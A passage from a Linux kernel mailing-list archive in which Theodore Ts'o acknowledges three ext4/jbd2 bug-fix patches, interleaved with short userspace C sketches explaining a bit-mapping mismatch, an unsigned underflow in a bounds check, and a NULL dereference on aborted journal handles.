> and use them for the FC_COMMITTING and FC_FLUSHING_DATA waits so the wait
> key follows the same mapping as the state helpers.
>
> [...]
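The mapping problem described above can be illustrated in userspace. This
is only a sketch under stated assumptions: the helper names are invented,
a single flags word is used on every word size (a simplification), and it
is not the code from the applied patch.

```c
#include <assert.h>
#include <limits.h>

/* Width of unsigned long on the build machine, in bits. */
#define SKETCH_BITS_PER_LONG (sizeof(unsigned long) * CHAR_BIT)

/*
 * Hypothetical helper: position of a dynamic state bit inside the
 * flags word. On 64-bit the state bits sit in the upper half, so the
 * raw state number is shifted up by 32.
 */
static unsigned int sketch_state_bit(unsigned int state)
{
	assert(state < 32);
	return SKETCH_BITS_PER_LONG == 64 ? state + 32 : state;
}

/* Set a state bit through the mapping helper. */
static void sketch_set_state(unsigned long *flags, unsigned int state)
{
	*flags |= 1UL << sketch_state_bit(state);
}

/* Test a state bit through the same mapping helper. */
static int sketch_test_state(const unsigned long *flags, unsigned int state)
{
	return (int)((*flags >> sketch_state_bit(state)) & 1UL);
}

/* What an open-coded user would see if it used the raw state number. */
static int sketch_test_raw(const unsigned long *flags, unsigned int state)
{
	return (int)((*flags >> state) & 1UL);
}
```

On a 64-bit build, after sketch_set_state(&flags, 3) the mapped test sees
the bit while sketch_test_raw(&flags, 3) does not, which is the kind of
mismatch a waiter keyed on the raw value would run into.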
Applied, thanks!
[1/1] ext4: fix fast commit wait/wake bit mapping on 64-bit
commit: 8b3bc93fee6771775243665a0cf31857d6659775
Best regards,
--
Theodore Ts'o <tytso@mit.edu>
^ permalink raw reply
* Re: [PATCH v2] jbd2: fix integer underflow in jbd2_journal_initialize_fast_commit()
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
To: Jan Kara, Harshad Shirwadkar, Junrui Luo
Cc: Theodore Ts'o, linux-ext4, linux-kernel, Yuhao Jiang, stable
In-Reply-To: <SYBPR01MB7881663C927DE9D7BBF4D1DFAF062@SYBPR01MB7881.ausprd01.prod.outlook.com>
On Wed, 13 May 2026 17:28:40 +0800, Junrui Luo wrote:
> jbd2_journal_initialize_fast_commit() validates journal capacity by
> checking (journal->j_last - num_fc_blks < JBD2_MIN_JOURNAL_BLOCKS).
> Both j_last and num_fc_blks are unsigned, so when num_fc_blks exceeds
> j_last the subtraction wraps to a large value, bypassing the bounds
> check.
>
> The resulting underflow corrupts j_last, j_fc_first, and j_free,
> leading to journal abort.
>
> [...]
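The wraparound described above is easy to reproduce in userspace. A
minimal sketch, assuming unsigned int operands and a stand-in minimum of
1024 blocks; the function names are invented here, and the checked form
is one possible guard, not necessarily what the applied patch does.

```c
#include <stdbool.h>

/* Stand-in for the minimum journal size; an assumption for this sketch. */
#define SKETCH_MIN_JOURNAL_BLOCKS 1024u

/*
 * Wrap-prone form: when fc_blks > last, the unsigned subtraction wraps
 * to a huge value, so the "too small" test reports false.
 */
static bool sketch_too_small_wrapping(unsigned int last, unsigned int fc_blks)
{
	return last - fc_blks < SKETCH_MIN_JOURNAL_BLOCKS;
}

/*
 * Wrap-free form: reject fc_blks > last before subtracting, so the
 * subtraction only runs when it cannot wrap.
 */
static bool sketch_too_small_checked(unsigned int last, unsigned int fc_blks)
{
	return fc_blks > last || last - fc_blks < SKETCH_MIN_JOURNAL_BLOCKS;
}
```

With last = 100 and fc_blks = 200, the wrapping form accepts the
configuration while the checked form rejects it; for ordinary inputs such
as last = 5000 and fc_blks = 256 the two agree.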
Applied, thanks!
[1/1] jbd2: fix integer underflow in jbd2_journal_initialize_fast_commit()
commit: 289a2ca0c9b7eae74f93fc213b0b971669b8683d
Best regards,
--
Theodore Ts'o <tytso@mit.edu>
^ permalink raw reply
* Re: [PATCH] jbd2: check for aborted handle in jbd2_journal_dirty_metadata()
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
To: jack, Deepanshu Kartikey
Cc: Theodore Ts'o, linux-ext4, linux-kernel,
syzbot+98f651460e558a21baae
In-Reply-To: <20260507050605.50081-1-kartikey406@gmail.com>
On Thu, 07 May 2026 10:36:05 +0530, Deepanshu Kartikey wrote:
> jbd2_journal_dirty_metadata() unconditionally dereferences
> handle->h_transaction at function entry to obtain the journal pointer:
>
> transaction_t *transaction = handle->h_transaction;
> journal_t *journal = transaction->t_journal;
>
> However, h_transaction may legitimately be NULL for an aborted handle.
> The is_handle_aborted() helper in include/linux/jbd2.h explicitly
> treats !h_transaction as one of the aborted states:
>
> [...]
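The ordering issue can be shown with mock types. This is a userspace
sketch only: the struct and function names are invented, the structures
are reduced to the fields mentioned above, and returning -EROFS for an
aborted handle is an assumption of the sketch rather than a statement
about the applied patch.

```c
#include <errno.h>
#include <stddef.h>

/* Mock types, reduced to the fields discussed above. */
struct sketch_journal {
	int aborted;
};

struct sketch_transaction {
	struct sketch_journal *t_journal;
};

struct sketch_handle {
	struct sketch_transaction *h_transaction;
	int h_aborted;
};

/* A handle with no transaction counts as aborted. */
static int sketch_handle_aborted(const struct sketch_handle *h)
{
	if (h->h_aborted || !h->h_transaction)
		return 1;
	return h->h_transaction->t_journal->aborted;
}

/* Check the handle first; only then follow h_transaction. */
static int sketch_dirty_metadata(const struct sketch_handle *h)
{
	struct sketch_journal *journal;

	if (sketch_handle_aborted(h))
		return -EROFS;	/* assumed error code for this sketch */

	/* h_transaction is known to be non-NULL from here on. */
	journal = h->h_transaction->t_journal;
	(void)journal;
	return 0;
}
```

Dereferencing h_transaction before the aborted check, as in the two
quoted declarations, would fault on a handle whose h_transaction is NULL;
with the check first, that handle simply gets an error back.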
Applied, thanks!
[1/1] jbd2: check for aborted handle in jbd2_journal_dirty_metadata()
commit: 8fc197cf366beaabaeb46575c8cf46fe5076b943
Best regards,
--
Theodore Ts'o <tytso@mit.edu>
^ permalink raw reply